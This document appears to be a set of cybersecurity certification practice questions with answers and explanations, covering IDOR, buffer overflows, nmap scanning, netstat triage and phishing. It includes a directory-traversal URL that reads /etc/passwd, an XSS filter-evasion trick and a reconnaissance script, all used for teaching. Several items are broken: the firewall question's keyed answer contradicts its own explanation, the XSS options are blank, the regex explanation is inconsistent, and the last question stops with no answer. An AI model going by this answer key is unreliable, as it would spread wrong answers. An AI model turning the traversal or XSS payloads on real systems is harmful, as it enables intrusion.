OBJ-3.4: The X-Frame-Options in the HTTP response header can be used to indicate whether or not a browser should be allowed to open a page in frame or iframe. If the X-Frame-Options header is not present, then a clickjacking exploit could be used against the web server’s users. The only two vulnerabilities shown in the Nikto results are the clickjacking vulnerability and the MIME Type security issue.
Yoyodyne Systems has recently bought out its competitor, Whamiedyne Systems, which went out of business due to a series of data breaches. As a cybersecurity analyst for Yoyodyne, you are assessing Whamiedyne’s existing applications and infrastructure. During your analysis, you discover the following URL is used to access an application:
- =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
https: //www.whamiedyne.com/app/accountInfo?acct=12345 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
You change the URL to end with 12346 and notice that a different user's account information is displayed. Which of the following type of vulnerabilities or threats have you discovered? A.Insecure Direct Object Reference B.SQL Injection C.Race Condition D.XML Injection
A.Insecure Direct Object Reference
Explanation:
OBJ-3.4: This is an example of an insecure direct object reference. Direct object references are typically insecure when they do not verify whether a user is authorized to access a specific object. Therefore, it is important to implement access control techniques in applications that work with private information or other sensitive data types. Based on the URL above, you cannot determine if the application is vulnerable to an XML or SQL injection attack. An attacker can modify one or more of these four basic functions in a SQL injection attack by adding code to some input within the web app, causing it to execute the attacker’s own set of queries using SQL. An XML injection is similar but focuses on XML code instead of SQL queries. A race condition is a software vulnerability when the resulting outcome from execution processes is directly dependent on the order and timing of certain events. Those events fail to execute in the developer’s order and timing, which is not the case in this scenario.
(This is a simulated performance-based question.)
You have been asked to help conduct a white box penetration test. As part of your preparations, you have been given the source code for the organization’s custom web application.
-=-=-=-=-=-
Linux:~ diontraining$ cat DionCode.c
void DionCode (char *varX)
{
char user_input[20];
Strcopy (user_input, varX);
}
-=-=-=-=-=-
Which type of vulnerability might be able to exploit the code shown in this image? A.SQL Injection B.Buffer Overflow C.JavaScript Injection D.Remote Code Execution
B.Buffer Overflow
Explanation:
OBJ-3.4: The function DionCode may be subject to a buffer overflow as the user enters something over 20 characters as their input. In defining the char (character) type array, the programmer only allocated 20 characters worth of memory storage. To solve this problem, the programmer should create proper input validation to ensure that the input is less than 20 characters before passing the user_input variable to the strcpy (string copy) function.
You have been hired to perform a penetration test against Dion Training's new voucher fulfillment web application. After presenting your findings to the client, they ask you to also perform a static code analysis of the application, add input sanitation to the code, and correct the web application firewall's configuration before they accept your final report. Which of the following has occurred? A.Scope Creep B.Tolerance to Impact C.Postmortem Review D.Goal Re prioritization
A.Scope Creep
Explanation:
OBJ-1.3: Scope creep is the condition that occurs when a client requests additional services after a SOW has been signed, and the project scope has been documented. This is not a condition that is limited to penetration testing, either. Practically every project manager or building contractor can provide examples of scope creep that happened with various projects. The big problem with scope creep is that it takes resources away from those documented in the SOW. It can also become a source of contention when it comes time to bill the client or complete the engagement.
Which type of threat will patches NOT effectively combat as a security control?
A.Discovered software bugs
B.Known Vulnerabilities
C.Zero-day Attacks
D.Malware with defined indicators of compromise
C.Zero-day Attacks
Explanation:
OBJ-5.3: Zero-day attacks have no known fix, so patches will not correct them. A zero-day vulnerability is a computer-software vulnerability that is unknown to, or unaddressed by, those who should be interested in mitigating the vulnerability (including the vendor of the target software). If a discovered software bug or known vulnerability is found, a patch or mitigation is normally available. If a piece of malware has well-defined indicators of compromise, a patch or signature can be created to defend against it, as well.
A recent vulnerability scan found several vulnerabilities on an organization’s public-facing IP addresses. To reduce the risk of a breach, which of the following vulnerabilities should be prioritized for remediation?
A.An HTTP response that reveals an internal IP address
B.A crypotgraphically weak encryption cipher
C.A buffer overflow that is known to allow remote code execution
D.A website utilizing a self-singed SSL certififcate
C.A buffer overflow that is known to allow remote code execution
Explanation:
OBJ-2.3: The most serious vulnerability discovered is one that could allow remote code execution to occur. Since this buffer overflow vulnerability is known to allow remote code execution, it must be mitigated first to prevent a security breach most effectively. While the other issues should be addressed eventually, you need to prioritize the most critical one (remote code execution) on a public-facing IP address. A public-facing IP address means the device is accessible from the internet.
A penetration tester is using a known vulnerability to compromise an Apache webserver. After they gain access to the server, what is their next step to pivot to a protected system behind the DMZ? A.Installing additional tools B.Patching C.Vulnerability scanning D.Privilege escalation
D.Privilege escalation
Explanation:
OBJ-3.5: Apache web servers are run as a limited user by default, not as an administrative or root account. To be efficient and effective, the penetration tester should attempt to conduct a privilege escalation before pivoting into the DMZ. As a penetration tester, they would not likely patch the system, conduct a vulnerability scan, or install additional tools. This does not help them achieve their goal of pivoting into the DMZ.
Dion Training has hired you to assess its voucher fulfillment REST API on its e-commerce website. Which of the following support resources would be MOST helpful in your assessment? A.Swagger document B.XSD File C.WSDL document D.SDK Documerntation
A.Swagger document
Explanation:
OBJ-1.1: A swagger document is the REST API equivalent of a WSDL document that defines a SOAP-based web service. Since Dion Training’s voucher fulfillment system uses a REST API, you should request a copy of the swagger document to conduct a more efficient assessment of their web application.
You have just finished running a vulnerability scan of the network and are reviewing the results. The first result in the report shows the following vulnerability:
You log into the MySQL server and verify that you are currently running version 3.5.3. Based on the item shown on the image, what best describes how you should categorize this finding? A.False positive B.True positive C.False negative D.True Negative
A.False positive
Explanation:
OBJ-2.3: You should categorize the results as a false positive. Based on the scenario and output, your server is not vulnerable to a remote code execution for the identified vulnerability. You are already running MySQL v3.5.3 that is greater than v3.3.x or above. This indicates that the vulnerability scanner falsely identified your MySQL version as an earlier and more vulnerable version. The system incorrectly identified a vulnerability, but the vulnerability doesn’t exist on your system. Therefore this is a false positive.
A firewall administrator has configured a new DMZ to allow public systems to be segmented from the organization’s internal network. The firewall now has three security zones set: Untrusted (Internet) [143.27.43.0/24]; DMZ (DMZ) [161.212.71.0/24]; Trusted (Intranet) [10.10.0.0/24]. The firewall administrator has been asked to enable remote desktop access from a fixed IP on the remote network to a remote desktop server in the DMZ for the Chief Security Officer to work from his home office after hours. The CSO’s home internet uses a static IP of 143.27.43.32. The remote desktop server is assigned a public-facing IP of 161.212.71.14. What rule should the administrator add to the firewall?
A.Permit 143.27.43.32 161.212.71.0/24 RDP 3389
B.Permit 143.27.43.0/24 161.212.71.0/24 RDP 3389
C.Permit 143.27.43.0/24 161.212.71.0 RDP 3389
D.Permit 143.27.43.0 161.212.71.0 RDP 3389
D.Permit 143.27.43.0 161.212.71.0 RDP 3389
Explanation:
OBJ-5.3: Due to the requirement to allow a single remote IP to enter the firewall, the permit statement must start with a single IP in the Untrusted (Internet) zone. Based on the options provided, only 143.27.43.32 could be correct. Next, the destination is a single server in the DMZ, so only 161.212.71.14 could be correct. The destination port should be 3389, which is the port for the Remote Desktop Protocol. Combining these three facts, only “permit 143.27.43.32 161.212.71.14 RDP 3389” could be correct.
You are scheduled to conduct a physical penetration test against an organization. You need to access the building after business hours when none of the employees are on-site. Which of the following methods would be the MOST effective to utilize? A.Dumpster Diving B.Fence Jumping C.Lock Picking D.Tailgating
C.Lock Picking
Explanation:
OBJ-3.6: Since there are no employees around, the most effective method would be to pick a lock on a door to enter the building. Lock picking is a skill, and a penetration tester requires practice with the right tools to be effective at it.
A coworker sent you the following Bash script to use during an upcoming engagement for Dion Training’s corporate network:
-=-=-=-=-=-
#!/bin/bash
echo "Enter an IP range: "
read IPrange nmap -sS $IPrange -p80,443 -oG tempfile
cat tempfile | grep open > tempfile1
cat tempfile1 | cut -f2 -d":" | cut -f1 -d"(" > tempfile
rm tempfile1
cat tempfile
-=-=-=-=-=-
During the upcoming engagement, what should you use this script to perform? A./Debugging an exploit B.Reconnaissance C.COllecting Logs D.Scheduling Tasks
B.Reconnaissance
Explanation:
OBJ-4.4: This simple Bash script is only 9 lines in length, but it creates a decent reconnaissance tool. The script asks the user for the starting and ending IP addresses to scan and then performs a nmap scan on each IP address to see if ports 80 and 443 are open. It logs this information to a greppable file called tempfile and then performs some filtering as it passes the data from tempfile to tempfile1. It then cleans up the format and overwrites the original tempfile. Then, it removes the tempfile1 that was used, leaving only the tempfile. Finally, it displays the tempfile to the screen, showing only the IP addresses with clients that have either port 80 or port 443 open.
Which of the following is exploited by an SQL injection to give the attacker access to a database? A.Web Application B.Firewall C.Database Server D.Operating System
A.Web Application
Explanation:
OBJ-3.4: SQL injections target the data stored in enterprise databases by exploiting flaws in client-facing applications. These vulnerabilities being exploited are most often found in web applications. The database server or operating system would normally be exploited by a remote code execution, a buffer overflow, or another type of server-side attack. The firewall would not be subject to an SQL injection.
You are conducting a review of a VPN device’s logs and found the following URL being accessed:
- =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
https: //sslvpn/dana-na/../diontraining/html5acc/teach/../../../../../../etc/passwd?/diontraining/html5acc/teach/ - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Based upon this log entry alone, which of the following most likely occurred?
A.The /etc/passwd file was downloaded using a directory traversal attack
B.An SQL Injection attack caused the VPN server to return the password file
C.A XML Injection attack caused the VPN server to return the password file
D.The /etc/passwd file was downloaded using a directory traversal attack if input validation of the URL was not conducted
D.The /etc/passwd file was downloaded using a directory traversal attack if input validation of the URL was not conducted
Explanation:
OBJ-3.4: The exact string used here was the attack string used in CVE-2019-11510 to compromise thousands of VPN servers worldwide using a directory traversal approach. However, its presence in the logs does not prove that the attack was successful, only that it was attempted. To verify that the attacker successfully downloaded the/etc/passwd file, a cybersecurity analyst would require additional information and correlation. If the server utilizes proper input validation on URL entries, then the directory traversal would be prevented. As no SQL or XML language elements are present, this is definitely not an SQL or XML injection attack.
You are conducting a grep search on a log file using the following REGEX expression:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
\b[A-Za-z0-9_%+-]+@[A-Za-z0-9.-]+.[A-Za-z]{2,6}\b
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Which of the following strings would be included in the output of the search? A.jason.dion@diontraining.com B.jason_dion@dion.training.com C.support@diontraining.com D.www.diontraining.com
C.support@diontraining.com
Explanation:
OBJ-4.4: In the above REGEX, the \b parameter identifies that we are looking for whole words. The strategic use of the + operator indicates the three places where the word is broken into parts. The first part ([A-Za-z0-9%+-]” is composed of upper or lower case alphanumeric symbols “%+-.” After the first part of the word and the at sign (@) is specified, follows by another word ([A-Za-z0-9.-]), a period (.), and another purely alphabetic (non-numeric) string that is 2-6 characters in length. This finds a standard email format of something@something.com (but could be @something.co, @something.org, @something.money, or other options as long as the top-level domain is between 2 and 6 characters). The option of www.diontraining.com is wrong because it does not have an @ sign in the string. The option of jason.dion@diontraining.com is wrong because you cannot use a period before the @ symbol, only letters, numbers, and some specified symbols ( _ % + - ). The option of jason_dion@dion.training is wrong because the last word (training) is longer than 6 characters in length. As a cybersecurity analyst, you must get comfortable creating regular expressions and understanding what type of output they generate.
Your organization has recently been the target of a spearphishing campaign. You have identified the website associated with the link in the spearphishing emails and want to block it. Which of the following techniques would be the MOST effective in this situation? A.URL FIlter B.Quarantine C.Containment D.Application Blacklist
A.URL FIlter
Explanation:
OBJ-5.3: A URL filter can be used to block a website based on its website address or universal resource locator (URL). This is not a containment technique but a blocking and filtering technique. Quarantine would be used against an infected machine, and it would not be effective against trying to block access to a given website across the entire organization. An application blacklist is used to prevent an application from running, so this cannot be used to block a single malicious or suspicious website or URL.
Your organization’s primary operating system vendor just released a critical patch for your servers. Your system administrators have recently deployed this patch and verified the installation was successful. This critical patch was designed to remediate a vulnerability that can allow a malicious actor to execute code on the server over the Internet remotely. You ran a vulnerability scan of the network and determined that all servers are still being reported as having the vulnerability. You verified all your scan configurations are correct. Which of the following might be the reason that the scan report still showing the servers as vulnerable? (SELECT ALL THAT APPLY)
A.The vulnerability assessment scan is returning a false postivie
B.This critical patch did not remediate the vulnerability
C.You conducted the vulnerability scan without waiting long enough after the patch was installed
D.The wrong IP Address range was scanned during your vulnerability assessment
A.The vulnerability assessment scan is returning a false postivie
B.This critical patch did not remediate the vulnerability
Explanation:
OBJ-2.3: There are two reasonable choices presented: (1) the vulnerability assessment scan is returning a false positive, or (2) this critical patch did not remediate the vulnerability. It is impossible to know which is based on the description in the question. If the patch was installed successfully, as the question states, then it is possible that the critical patch was coded incorrectly and did not actually remediate the vulnerability. While most operating system vendors test their patches before release to prevent this, they are sometimes rushed into production with extremely critical patches. The patch does not actually remediate the vulnerability on all systems. When this occurs, the vendor will issue a subsequent patch to fix it and supersede the original patch. The other option is that the vulnerability assessment tool is incorrectly configured and is returning a false positive. This can occur when the signature used to detect the vulnerability is too specific or too generic to actually detect whether the system was patched for the vulnerability or not. The other options are incorrect, as you do not have to wait a certain period of time after installation before scanning. It is assumed that you are scanning the same IP range both times as you have verified your scan configuration.
A cybersecurity analyst is analyzing an employee’s workstation that is acting abnormally. The analyst runs the netstat command and reviews the following output:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Proto Local Address Foreign Address State
TCP 0.0.0.0:53 0.0.0.0:0 LISTENING
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING
TCP 0.0.0.0:5357 0.0.0.0:0 LISTENING
TCP 192.168.1.4:53 91.198.117.247:443 CLOSE_WAIT
TCP 192.168.1.4:59393 74.125.224.39:443 ESTABLISHED
TCP 192.168.1.4:59515 208.50.77.89:80 ESTABLISHED
TCP 192.168.1.4:59518 69.171.227.67:443 ESTABLISHED
TCP 192.168.1.4:59522 96.16.53.227:443 ESTABLISHED
TCP 192.168.1.4:59523 96.16.53.227:443 ESTABLISHED
TCP 192.168.1.4:53 208.71.44.30:80 ESTABLISHED
TCP 192.168.1.4:59538 74.125.224.98:80 ESTABLISHED
TCP 192.168.1.4:59539 74.125.224.98:80 ESTABLISHED
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Based on this output, which of the following entries is suspicious? (SELECT THREE)
A.TCP 192.168.1.4:59515 208.50.77.89:80 ESTABLISHED
B.TCP 192.168.1.4:59518 69.171.227.67:443 ESTABLISHED
C.TCP 192.168.1.4:53 91.198.117.247:443 CLOSE_WAIT
D.TCP 0.0.0.0:53 0.0.0.0 LISTENING
E.TCP 0.0.0.0:135 0.0.0.0
F.TCP 192.168.1.4:53 208.71.44.30:80 ESTABLISHED
C.TCP 192.168.1.4:53 91.198.117.247:443 CLOSE_WAIT
D.TCP 0.0.0.0:53 0.0.0.0 LISTENING
F.TCP 192.168.1.4:53 208.71.44.30:80 ESTABLISHED
Explanation:
OBJ-4.3: While we cannot be certain that any malicious activity is ongoing based solely on this netstat output, the three entries concerning port 53 are suspicious and should be further investigated. Port 53 is used for DNS servers to receive requests, and an employee’s workstation running DNS would be unusual. If the Foreign Address using port 53, this would indicate the workstation was conducting a normal DNS lookup, but based on the network traffic direction, this is not the case. The entry that is listening on port 135 is not suspicious for a Windows workstation since this is used to conduct file sharing across a local Windows-based network with NetBIOS. The two entries from a random high number port to a web server (port 80 and port 443) is normal network traffic. The web server listens on a well-known or reserved port (port 80 and port 443) and then responds to the random high number port chosen by the workstation to conduct two-way communications.
You are attempting to prioritize your vulnerability scans based on the data’s criticality. This will be determined by the asset value of the data contained in each system. Which of the following would be the most appropriate metric to use in this prioritization?
A.Cost of acquisition of the system
B.Type of data processed by the system
C.Cost of the hardware replacement of the system
D.Depreciated hardware cost of the system
B.Type of data processed by the system
Explanation:
OBJ-5.1: The data’s asset value is a metric or classification that an organization places on data stored, processed, and transmitted by an asset. Different data types, such as regulated data, intellectual property, and personally identifiable information, can determine its value. The cost of acquisition, cost of hardware replacement, and depreciated costs refer to the financial value of the hardware or system itself. This can be significantly different from the value of the information and data that the system stores and processes.
You are conducting a penetration test and planning to use a cross-site scripting attack. During your reconnaissance, you determined that the system performs input validation using REGEX to prevent any strings that contain the term "[Ss][Cc][Rr][Ii][Pp][Tt]" in the input. To bypass this input validation, which of the following variations of the script tag should you utilize? A. B. C.<%53CRIPT> D.<$script>
C.
Explanation:
OBJ-3.4: Since cross-site scripting (XSS) relies on the and HTML tags to launch, the system administrators had a good idea of creating input validation using a REGEX for those keywords. Unfortunately, they forgot to include a more inclusive version of this REGEX to catch all variants. For example, simply using [Ss][Cc][Rr][Ii][Pp][Tt] would have been much more secure, but even this would miss %53CRIPT would evade this filter. To catch all the letter S variants, you would need to use [%53%%73Ss], which includes the capital S in hex code, the lower case s in hex code, the capital S, and the lowercase s. As a penetration tester, it is important to remember that you can evade weak input validation using ASCII encoded characters, like %53 for the S character. As a cybersecurity analyst, you must build good input validations into your systems to prevent these types of attacks.
A company is implementing enhanced user authentication for system administrators accessing the company's confidential servers. They intend to use two-factor authentication to accomplish this. Which of these BEST represents two-factor authentication? A.Username and password B.ID Badge and Keys C.Fingerprint scanner and retina scan D.Password and key fob
D.Password and key fob
Explanation:
OBJ-5.3: Two–factor authentication requires 2 out of 3 of the following: something you know, something you have, something you are. Therefore, the only correct answer is a password (something you know) and a key fob (something you have).
A supplier needs to connect several laptops to an organization’s network as part of their service agreement. These laptops will be operated and maintained by the supplier. Victor, a cybersecurity analyst for the organization, is concerned that these laptops could contain some vulnerabilities that could weaken the network’s security posture. What can Victor do to mitigate the risk to other devices on the network without having direct administrative access to the supplier’s laptops?
A.Increate the encryption level of the VPN used by the laptops
B.Scan the laptops for vulnerabilities and patch them
C.Implement a jumpbox system
D.Require 2FA (two factor authentication) on the laptops
C.Implement a jumpbox system
Explanation:
OBJ-5.3: A jumpbox is a system on a network used to access and manage devices in a separate security zone. This would create network segmentation between the supplier’s laptops and the rest of the network to minimize the risk. A jump-box system is a hardened and monitored device that spans two dissimilar security zones and provides a controlled means of access between them. While the other options listed are all good security practices, they do not fully mitigate the risk that insecure systems pose since Victor cannot enforce these configurations on a supplier provided laptop. Instead, he must find a method of segmenting the laptops from the rest of the network, either physically, logically, using an airgap, or using a jumpbox.
You have been contracted to conduct a penetration test on a regional hospital chain to validate their compliance with industry standards. Which of the following should you scan for when performing this compliance-based assessment? (Select TWO)
A.Cookioe Manipulation on the client’s web browser
B.Cleartext credentials in LDAP
C.Data at rest improperly configured on the database
D.Tailgating or piggybacking into the waiting room
E.Lack of digital code signing
F.PHI being transmitted over HTTP
C.Data at rest improperly configured on the database
F.PHI being transmitted over HTTP
Explanation:
OBJ-1.4: While all of these may pose valid threats, this scenario is conducting a compliance-based assessment. Since this organization is a hospital, it falls under the health care industry. Health care is regulated in terms of patient privacy and the protection of their records. Therefore, your assessment should prioritize the PHI (personal health information) data being insecurely transmitted over HTTP and the database not properly using data at rest to protect patient data.
An analyst’s vulnerability scanner did not have the latest set of signatures installed. Due to this, several unpatched servers may have vulnerabilities that were undetected by their scanner. You have directed the analyst to update their vulnerability scanner with the latest signatures at least 24 hours before conducting any scans. However, the results of their scans still appear to be the same. Which of the following logical controls should you use to address this situation?
A.Ensure the analyst manually validates that the updates are being performed as directed
B.Configure the vulnerability scanners to run in credentials mode
C.Test the vulnerability remediation in a sandbox before deploying them into production
D.Create a script to automatically update the signatures every 24 hours
D.Create a script to automatically update the signatures every 24 hours
Explanation:
OBJ-2.2: Since the analyst appears not to be installing the latest vulnerability signatures according to your instructions, it would be best to create a script and automate the process to eliminate human error. The script will always ensure that the latest signatures are downloaded and installed in the scanner every 24 hours without any human intervention. While you may want the analyst to manually validate the updates were performed as part of their procedures, this is still error-prone and likely not to be conducted properly. Regardless of whether the scanners are being run in uncredentialed or credentialed mode, they will still miss vulnerabilities if using out-of-date signatures. Finally, the option to test the vulnerability remediations in a sandbox is a good suggestion. Still, it won’t solve this scenario since we are concerned with the scanning portion or vulnerability management and not remediation.
What nmap switch would you use to determine which UDP ports are open on a targeted network? A.-sN B.-sS C.-sP D.-sU
D.-sU
Explanation
OBJ-4.1: In nmap, the -sU flag is used to scan UDP ports. The -sS flag will only scan TCP ports using an SYN scan. The -sP flag is a legacy (and depreciated) command for a ping scan. The -sN flag is used to conduct a TCP NULL scan.
You have been researching WPA2 and just discovered a new vulnerability in its implementation in a popular SOHO access point. You have created a harmless exploit to demonstrate the vulnerability and published it to a cybersecurity blog. You did not provide the details of exactly how your exploit works but have told others they need to update their access point's firmware to version 10.2 to mitigate this vulnerability. Which of the following techniques did you use in this scenario? A.Exploit chaining B.Cross-compiling code C.Exploit Modification D.Proof of concept
D.Proof of concept
Explanation:
OBJ-2.4: In this scenario, the only one of these techniques we know was used for certain is a proof of concept. A proof of concept is a benign exploit developed to highlight vulnerabilities in a system or product. Usually, a proof of concept is developed by security researchers to demonstrate a flaw of vulnerability in a widely used system, software, hardware, or protocol. The technical details may not be initially published until the researcher can provide the information to the companies affected, and they can release a patch. Other times, the security researchers will provide all the details in their security blogs so that both defenders and attackers know the exploit’s details.
Jorge is working with an application team to remediate a critical SQL injection vulnerability on a public-facing server. The team is worried that deploying the fix will require several hours of downtime and block customer transactions from being completed by the server. Which of the following is the BEST action for Jorge to recommend?
A.Delay the remediation until the next major update of the SQL server occurs
B.Schedule an emergency maintenance for an off-peak time later in the day to remediate the vulnerability
C>Wait until next scheduled maintenance window to remediate the vulnerability
D.Remediate the vulnerability immediately
B.Schedule an emergency maintenance for an off-peak time later in the day to remediate the vulnerability
Explanation
OBJ-5.3: Jorge should recommend that emergency maintenance windows be scheduled for an off-peak time later in the day. Since the vulnerability is critical, it needs to be remediated or mitigated as quickly as possible. But, this also needs to be balanced against the business and operational needs. Therefore, we cannot simply remediate it immediately, as this would cause downtime for this public-facing server. It is also unreasonable to accept the risk until the next scheduled maintenance window since it is a critical vulnerability. Therefore, the best way to balance the risk of the vulnerability and the outage’s risk is to schedule an emergency maintenance window and patch the server during that time.
Lamont is in the process of debugging a software program. As he examines the code, he discovers that it is miswritten. Due to the error, the code does not validate a variable's size before allowing the information to be written into memory. Based on Lamont’s discovery, what type of attack might occur? A.SQL Injection B.Buffer Overflow C.Malicious Logic D.Cross-site scripting
B.Buffer Overflow
Explanation:
OBJ-3.4: A buffer overflow occurs when a program or process tries to store more data in a buffer (temporary data storage area) than it was intended to hold. Since buffers are created to contain a finite amount of data, the extra information can cause an overflow into adjacent buffers, corrupting or overwriting the valid data held in them. Although it may occur accidentally through programming error, buffer overflow is an increasingly common security attack on data integrity. In buffer overflow attacks, the extra data may contain codes designed to trigger specific actions, in effect sending new instructions to the attacked computer that could, for example, damage the user’s files, change data, or disclose confidential information. Programs should use the variable size validation before writing the data to memory to ensure that the variable can fit into the buffer to prevent this type of attack.
You are conducting a wireless penetration test against an organization. During your attack, you created an evil twin of their wireless network. Many of the organization's laptops are now connected to your evil twin access point. Which of the following exploits should you utilize next to gather credentials from the victims browsing the internet through your access point? A.Karma attack B.Deauthentication attack C.Fragmentation attack D.Downgrade attack
D.Downgrade attack
Explanation:
OBJ-3.3: A downgrade attack forces a client to use a weaker SSL version that the attacker can crack. Since the devices are connected through your access point, you can establish a weaker SSL-based HTTPS connection between their web browser and the actual web server they wanted. This forcing of the client to use a weaker version is known as a downgrade attack, and it allows the attacker to capture the packets and later crack them offline since SSL-based HTTPS is weak enough to crack due to vulnerabilities in its design.
Dion Training Solutions has just installed a backup generator for their offices that use SCADA/ICS for remote monitoring of the system. The generator’s control system has an embedded cellular modem that periodically connects to the generator’s manufacturer to provide usage statistics. The modem is configured for outbound connections only, and the generator has no data connection with any of Dion Training’s other networks. The manufacturer utilizes data minimization procedures and uses the data to recommend preventative maintenance service and ensure maximum uptime and reliability by identifying parts that need to be replaced. Which of the following cybersecurity risk is being assumed in this scenario?
A.There is medium risk being assumed since the manufacturer could use the data for purposes other than originally agreed upon
B.There is a critical risk being assumed since the cellular modem represents a threat to the enterprise network if an attack exploits the generator and then pivots to the production environment
C.There is high risk being assumed since the presence of a cellular modem could allow an attacker to remotely disrupt the generator
D.There is minimal risk being assumed since the cellular modem is configured for outbound connection only
D.There is minimal risk being assumed since the cellular modem is configured for outbound connection only
Explanation:
OBJ-2.5: There is minimal risk being assumed in this scenario since the cellular modem is configured for outbound connections only. This also minimizes the risk of an attacker gaining remote access to the generator. The generator is logically and physically isolated from the rest of the enterprise network, so even if an attacker could exploit the generator, they could not pivot into the production network. While there is a risk of the manufacturer using the data for purposes other than originally agreed upon, this is a minimal risk due to the manufacturer’s data minimization procedures and the type of data collected. Should the manufacturer choose to use usage statistics about the generator for some other purpose, it would have a negligible impact on the company since it does not contain any PII or proprietary company data.
An attacker has been collecting credit card details by calling victims and using false pretexts to trick them. Which of the following types of attack is being conducted? A.Vishing B.Phishing C.Spear Phishing D.Whaling
A.Vishing
Explanation:
OBJ-3.1: Vishing uses a phone call to conduct information gathering and phishing type of actions.
You have run a vulnerability scan and received the following output:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
CVE-2011-3389
QID 42366 - SSLv3.0/TLSv1.0 Protocol weak CBC mode Server side vulnerability
Check with: openssl s_client -connect login.diontraining.com:443 - tls -cipher “AES:CAMELLISA:SEED:3DES:DES”
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Which of the following categories should this be classified as?
A.Web application cryptography vulnerability
B.VPN tunnel vulnerability
C.Active Directory encryption vulnerability
D.PKI transfer vulnerability
A.Web application cryptography vulnerability
Explanation:
OBJ-3.4: This vulnerability should be categories as a web application cryptographic vulnerability. This is shown by the weak SSLv3.0/TLSv1.0 protocol being used in cipher block chaining (CBC) mode. Specifically, the use of the 3DES and DES algorithms during negotiation is a significant vulnerability. A stronger protocol should be used, such as forcing the use of AES.
While investigating a data breach, you discover that the account credentials used belonged to an employee who was fired several months ago for misusing company IT systems. Apparently, the IT department never deactivated the employee's account upon their termination. Which of the following categories would this breach be classified as? A.Insider threat B.Zero-day C.Known threat D.Advanced persistent threat
A.Insider threat
Explanation:
OBJ-1.3: An insider threat is any current or former employee, contractor, or business partner who has or had authorized access to an organization’s network, system, or data and intentionally exceeded or misused that access in a manner that negatively affected the confidentiality, integrity, or availability of the organization’s information or information systems. Based on the details provided in the question, it appears the employee’s legitimate credentials were used to conduct the breach. This would be classified as an insider threat. A zero-day is a vulnerability in software unpatched by the developer or an attack that exploits such a vulnerability. A known threat is a threat that can be identified using a basic signature or pattern matching. An advanced persistent threat (APT) is an attacker with the ability to obtain, maintain, and diversify access to network systems using exploits and malware.
What system contains a publicly available set of databases with registration contact information for every domain name on the Internet? A.IETF B.IANA C.CAPTCHA D.WHOIS
D.WHOIS
Explanation:
OBJ-2.1: WHOIS is a query and response protocol widely used for querying databases that store the registered users or assignees of an Internet resource, such as a domain name, an IP address block, or an autonomous system. WHOIS also is used for a broader range of information. The protocol stores and delivers database content in a human-readable format and is publicly available for use. The Internet Assigned Numbers Authority is a standards organization that oversees global IP address allocation, autonomous system number allocation, root zone management in the Domain Name System, media types, and other Internet Protocol-related symbols and Internet numbers. A CAPTCHA is a type of challenge-response test used in computing to determine whether the user is human. The Internet Engineering Task Force (IETF) is an open standards organization that develops and promotes voluntary Internet standards, particularly the standards that comprise the Internet protocol suite.
What must be developed to show security improvements over time? A.Reports B.Testing Tools C.Taxonomy of vulnerabilities D.Metrics
D.Metrics
Explanation:
OBJ-5.1: Metrics are a method of measuring something over time. If you wish to show the effect of security improvements over time, creating metrics would be a good option. For example, you may wish to look at the number of unpatched and known vulnerabilities. As this number decreases, your network would be considered to have improved security. Reports and testing tools alone cannot show progress. You must have measurable results using metrics.
You are preparing for the exploitation of Dion Training’s systems as part of a penetration test. During your research, you determined that Dion Training is using application containers for each of their websites. You believe that these containers are all hosted on the same physical underlying server. Which of the following components should you attempt to exploit to gain access to all of the websites at once?
A.Configuration files
B.Their e-commerce websites web application
C.Hypervisor vulnerabilities
D.Common Libraries
D.Common Libraries
Explanation:
OBJ-2.5: Application containers are virtualized environments designed to package and run a single computing application or service and share the same host kernel. Since they share the same host kernel, they use common libraries, as well. If you can exploit the common libraries, you will gain access to every website on that server, even if they are in an application container. An application container does not use a hypervisor like a typical virtual machine. Configuration files are unique to each application container. The e-commerce website’s web application is likely hosted in a single application container and, therefore, would not provide you access to every website simultaneously if exploited.
What problem can you solve by using Wireshark?
A.Performing packet captures and analysis on a network
B.Tracking source code version changes
C.Resetting the administrator password on three different servers
D.Validating the creation dates of webpages on a server
A.Performing packet captures and analysis on a network
Explanation:
OBJ-4.2: Wireshark is a free and open-source packet analyzer. It is used for network troubleshooting, analysis, software and communications protocol development, and education. It cannot perform any of the other three options.
You are working as part of a penetration testing team targeting Dion Training's mobile device software. Which of the following tools would NOT be helpful while trying to exploit their mobile applications? A.APKX B.Androzer C.APK Studio D.Dirbuster
D.Dirbuster
Explanation:
OBJ-4.2: Dirbuster is a brute force tool included with Kali Linux that exposes directories and file names on web and application servers. Androzer is a security testing framework for Android apps and devices. APKX (Android Package Kit) is a Python wrapper for dex converters and Java decompilers included in the OWASP Mobile Testing Guide. APK Studio is a cross-platform IDE for reverse engineering Android applications.
Which of the following Nmap commands would scan DionTraining.com and probe any open ports to determine the versions of the running services on those ports? A.nmap -sT DionTraining.com B.nmap -sV DionTraining.com C.nmap -sS DionTraining.com D.nmap -sL DionTraining.com
B.nmap -sV DionTraining.com
Explanation:
OBJ-4.1: The -sV option will scan the target by probing all the open ports to determine the service version they are running. The -sS option will scan the target using a TCP SYN packet and conduct a half-open scan. The -sT option will scan the target by conducting a full TCP 3-way handshake. The -sU option will scan the target by conducting a UDP scan.
You are working at the service desk as a network security technician and just received the following email from an end-user who believes a phishing campaign is being attempted.
From: user@diontraining.com
To: abuse@diontraining.com
Subject: You won a free iPhone!
Dear Susan,
You have won a brand new iPhone!
Just click the following link to provide your address so we can ship it out to you this afternoon: (http://www.freephone.io:8080/winner.php)
What should you do to prevent any other employees from accessing the link in the email above while still allowing them access to any other webpages at the domain freephone.io?
A.Add DENY IP ANY ANY EQ 8080 to the IPS filter
B.Add http://www.freephone.io:8080/winner.php to the load balancer
C.Add DENY TCP http://www.freephone.io ANY EQ 8080 to the firewall ACL
D.Add http://www.freephone.io:8080/winner.php to the browsers group policy block list
